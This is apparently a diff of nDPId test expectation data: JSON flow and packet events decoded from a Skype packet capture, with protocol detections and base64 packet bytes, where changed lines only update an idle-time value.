00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1431969643486,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969643486,"pkt":"0NQSxnP1PBXCt3IOCABFAABK1twAAEARIFPAqAEiwKgBAd\/IADUANro4UU4BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAABwAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1431969643486,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969643486,"pkt":"0NQSxnP1PBXCt3IOCABFAABKJUgAAEAR0efAqAEiwKgBAcNGADUANrH\/diQBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAAAEAAQ=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643944,"flow_last_seen":1431969643944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643944,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431969643944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643944,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYXlAAEAG9xvAqAEiQTffIcNuAbtcUOQ7AAAAALAC\/\/9\/kQAAAgQFtAEDAwUBAQgKPiKRcAAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643944,"flow_last_seen":1431969643944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643944,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431969643944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643944,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYXlAAEAG9xvAqAEiQTffIcNuAbtcUOQ7AAAAALAC\/\/9\/kQAAAgQFtAEDAwUBAQgKPiKRcAAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431969643971,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969643971,"pkt":"0NQSxnP1PBXCt3IOCABFAABLW5oAAEARm5TAqAEiwKgBAeuAADUAN9PqYyoBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 
00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -89,8 +89,8 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431969644054,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969644054,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6xBwAAEARMyPAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXA0AAEARmyzAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi\/oAAEARaz\/AqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431969644100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969644100,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIgG7w24uYYHqXFDkPKASOJC9NAAAAgQFrAQCCApNl5zhPiKRcAEDAwk="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431969644100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969644100,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0M2pAAEAGJTfAqAEiQTffIcNuAbtcUOQ8LmGB64AQECwTyAAAAQEICj4ikgdNl5zh"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431969644100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969644100,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIgG7w24uYYHqXFDkPKASOJC9NAAAAgQFrAQCCApNl5zhPiKRcAEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431969644100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969644100,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0M2pAAEAGJTfAqAEiQTffIcNuAbtcUOQ8LmGB64AQECwTyAAAAQEICj4ikgdNl5zh"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431969644284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969644284,"pkt":"0NQSxnP1PBXCt3IOCABFAABDbaEAAEARiZXAqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1431969644285,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969644285,"pkt":"0NQSxnP1PBXCt3IOCABFAABDF2AAAEAR39bAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1431969644431,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969644431,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7zZ4AAEARKaDAqAEiwKgBAf+SADUAJwCOlegBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} 
@@ -109,10 +109,10 @@ 00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":180000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1431969648274,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1431969648274,"pkt":"AQBef\/\/6oPPBbTu2CABFAAFRAosAAAQRAXHAqAD+7\/\/\/+gQBB2wBPQhzTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogVFAtTElOSyBXaXJlbGVzcyBOIE5hbm8gUm91dGVyIFdSNzAyTiwgVVBuUC8xLjANClVTTjogdXVpZDp1cG5wLUludGVybmV0R2F0ZXdheURldmljZS0xOTIxNjgwMjU0Nzg5MDAwMDENCg0K"} 
00924{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1431969648291,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":405,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":405,"pkt_l4_len":371,"thread_ts_msec":1431969648291,"pkt":"AQBef\/\/6oPPBbTu2CABFAAGHAowAAAQRATrAqAD+7\/\/\/+gQBB2wBc+ePTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpJbnRlcm5ldEdhdGV3YXlEZXZpY2U6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCg0K"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431969649862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431969649862,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJCUdAADQGY89soKouwKgBIgG7wSW4YeeiqCbN0IAYAEgh+QAAAQEICmF6dG0+IfU9FwMBARD7Uh6I13FzmcC+6gIV5n6AJhrBsHNwxcug1X4hBQozb5rifdWfxFgx5N7\/STRCna2lXcJzFlsdHwFqwb5pWB6kc7KLSFtZJ1+xqs\/LWpjXKXVYWA3FemYFVDyRXOngCpgT23pGW6q+fdoixXKwG46vp4NCAhC8D9JiN3KitsOr260NevBFtGudn3qUJfX\/3DhGLatA0j+U2CwrLM6DTOg9xpgfiq+azd0+zhMP0HAm0WOjBrmnGfTNcgHh+iJmkjL5sJ7TuSOU5HIOWUg6nL2f38I4\/Fmt1UsWozkMatK9FYjzbVIEXXgeh7hu8fTbVAUDu9Avc4N0XIcK0QG830wTIghFDiessVKi+sWFRr4k9g=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431969649862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969649862,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05cZAAEAGfGTAqAEibKCqLsElAbuoJs3QuGHot4AQD\/f34wAAAQEICj4iqE1henRt"} 
-01768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431969649865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431969649865,"pkt":"0NQSxnP1PBXCt3IOCABFAAPu\/qxAAEAGX8TAqAEibKCqLsElAbuoJs3QuGHot4AYEACQpAAAAQEICj4iqE9henRtFwMBACCGlFiiXnGNbnUA8eFNVg97y26hgjzRrXr8V0YtIj6nMBcDAQOQKBOjiVJxpWdYeLLT\/Xbro3HQPBzjJPC4nFo8EDiP\/qwXTbKKHYw0zh5BjL36gX1CXDX+RahFJG73NIEjJWIM604+RslBUiVdP7BtOTwH9Na9fDbxf2Np60NBtc7IDn0njVPn\/OQFpDztHwH7ReKVzxI3mekCkJeQu5frlXMtzYs\/A6\/788RG\/9eQL\/SpUlGx+OzCYIvqD3TfRfjbcI0rUIMK13b81m\/QfwBa7fmPZMBLpKLV+owE6zVvsZhb2YounO4vXImcKbLXc+pHduRZUFgR7JTndx4BwWKNOeOJb0lOXmVFpPD2t5ChyQpB8B7yAVMimVYrMkRjOI+yOmuEWzpBBb71HAu2RXfIAr1ik+\/qd4k78SdOCRVzA9X9FlfHQtMw2+\/RMHqj5tfPuEb1dJqljOBer+yTyAiFyXzsxxDLI9ugRcdcvYukWjNLVzxsQTVIpyochPhHmfXZ5n\/eZ4dJphlsEijiHWw2q71oBZmMc5GGD6vO7ZjLO3AJWFPWmwoscaJzsLs58ocuQ2qdcOCA7GGVHN\/ijVl75hciIPcfOvLZ6urcFhUq1WWuqtEbVnfmbri38YkIXbc7ejHLENq2QCqsgj5enMQz75I2\/pet\/YCSsRs1eqVYMNg8xjXCKqSJQl62\/bTcGsNwyoxippOcJq8VpG7H7Fvy+AXb68gGTkeGTRQKqtF74u9vbasRDNwPq8\/DPKRvzqNHk914l9uHQ2AKRiwOC\/bnlDR9ocQFekQhsprf\/xDrXO7tscQNAKBRL+tD76zQwjIPz3PJEHN3Pc+QE5WHu5rFSvvxfz\/Z2\/HSf2Um2ZE3koBnXh0ea61MNA9NADFAPSD8Z5NIyJgusH5hoNWKXVoIkzU5GHgbwG14JuajpHBJlMNEXsfmLLVK9oYSSz6nK+qKkyM3mC7X8XBCMQsh\/0ouHgH6HndraUIKsjtp3JPkKjI4aYdJ0qIoz0PG\/x3wOUA4h1YDaa67wXVn4YAKaKBMtrlL40SzVa5Z91cUYV13ZvBCGjlszRtWPZdtD1L\/SaFfIp1tQJKNS\/3Rzkx+IjbAX1llTBgWy3mJMF73JAKDegzbMvdSvKJ6AUv810GsIeQ99gKRkiy\/yhCs7P73CjnzDITEbSmsOsmYIQAoX97vBTFy0OqF392JfqJYzpguRdJo39kQQV95yc415TouOPz9jkaLSSogaYBmY8ija5cax3+df915"} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431969649862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431969649862,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJCUdAADQGY89soKouwKgBIgG7wSW4YeeiqCbN0IAYAEgh+QAAAQEICmF6dG0+IfU9FwMBARD7Uh6I13FzmcC+6gIV5n6AJhrBsHNwxcug1X4hBQozb5rifdWfxFgx5N7\/STRCna2lXcJzFlsdHwFqwb5pWB6kc7KLSFtZJ1+xqs\/LWpjXKXVYWA3FemYFVDyRXOngCpgT23pGW6q+fdoixXKwG46vp4NCAhC8D9JiN3KitsOr260NevBFtGudn3qUJfX\/3DhGLatA0j+U2CwrLM6DTOg9xpgfiq+azd0+zhMP0HAm0WOjBrmnGfTNcgHh+iJmkjL5sJ7TuSOU5HIOWUg6nL2f38I4\/Fmt1UsWozkMatK9FYjzbVIEXXgeh7hu8fTbVAUDu9Avc4N0XIcK0QG830wTIghFDiessVKi+sWFRr4k9g=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431969649862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969649862,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05cZAAEAGfGTAqAEibKCqLsElAbuoJs3QuGHot4AQD\/f34wAAAQEICj4iqE1henRt"} 
+01768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431969649865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431969649865,"pkt":"0NQSxnP1PBXCt3IOCABFAAPu\/qxAAEAGX8TAqAEibKCqLsElAbuoJs3QuGHot4AYEACQpAAAAQEICj4iqE9henRtFwMBACCGlFiiXnGNbnUA8eFNVg97y26hgjzRrXr8V0YtIj6nMBcDAQOQKBOjiVJxpWdYeLLT\/Xbro3HQPBzjJPC4nFo8EDiP\/qwXTbKKHYw0zh5BjL36gX1CXDX+RahFJG73NIEjJWIM604+RslBUiVdP7BtOTwH9Na9fDbxf2Np60NBtc7IDn0njVPn\/OQFpDztHwH7ReKVzxI3mekCkJeQu5frlXMtzYs\/A6\/788RG\/9eQL\/SpUlGx+OzCYIvqD3TfRfjbcI0rUIMK13b81m\/QfwBa7fmPZMBLpKLV+owE6zVvsZhb2YounO4vXImcKbLXc+pHduRZUFgR7JTndx4BwWKNOeOJb0lOXmVFpPD2t5ChyQpB8B7yAVMimVYrMkRjOI+yOmuEWzpBBb71HAu2RXfIAr1ik+\/qd4k78SdOCRVzA9X9FlfHQtMw2+\/RMHqj5tfPuEb1dJqljOBer+yTyAiFyXzsxxDLI9ugRcdcvYukWjNLVzxsQTVIpyochPhHmfXZ5n\/eZ4dJphlsEijiHWw2q71oBZmMc5GGD6vO7ZjLO3AJWFPWmwoscaJzsLs58ocuQ2qdcOCA7GGVHN\/ijVl75hciIPcfOvLZ6urcFhUq1WWuqtEbVnfmbri38YkIXbc7ejHLENq2QCqsgj5enMQz75I2\/pet\/YCSsRs1eqVYMNg8xjXCKqSJQl62\/bTcGsNwyoxippOcJq8VpG7H7Fvy+AXb68gGTkeGTRQKqtF74u9vbasRDNwPq8\/DPKRvzqNHk914l9uHQ2AKRiwOC\/bnlDR9ocQFekQhsprf\/xDrXO7tscQNAKBRL+tD76zQwjIPz3PJEHN3Pc+QE5WHu5rFSvvxfz\/Z2\/HSf2Um2ZE3koBnXh0ea61MNA9NADFAPSD8Z5NIyJgusH5hoNWKXVoIkzU5GHgbwG14JuajpHBJlMNEXsfmLLVK9oYSSz6nK+qKkyM3mC7X8XBCMQsh\/0ouHgH6HndraUIKsjtp3JPkKjI4aYdJ0qIoz0PG\/x3wOUA4h1YDaa67wXVn4YAKaKBMtrlL40SzVa5Z91cUYV13ZvBCGjlszRtWPZdtD1L\/SaFfIp1tQJKNS\/3Rzkx+IjbAX1llTBgWy3mJMF73JAKDegzbMvdSvKJ6AUv810GsIeQ99gKRkiy\/yhCs7P73CjnzDITEbSmsOsmYIQAoX97vBTFy0OqF392JfqJYzpguRdJo39kQQV95yc415TouOPz9jkaLSSogaYBmY8ija5cax3+df915"} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431969652367,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969652367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+qlYAAEARtuTAqAEiQAQXpjLdnFYAKjPsm5AC0vz7eA6m1WQz3XSdSXIE0xPsZ0Mgdb244ufZVMBp9g=="} 00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -188,12 +188,12 @@ 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 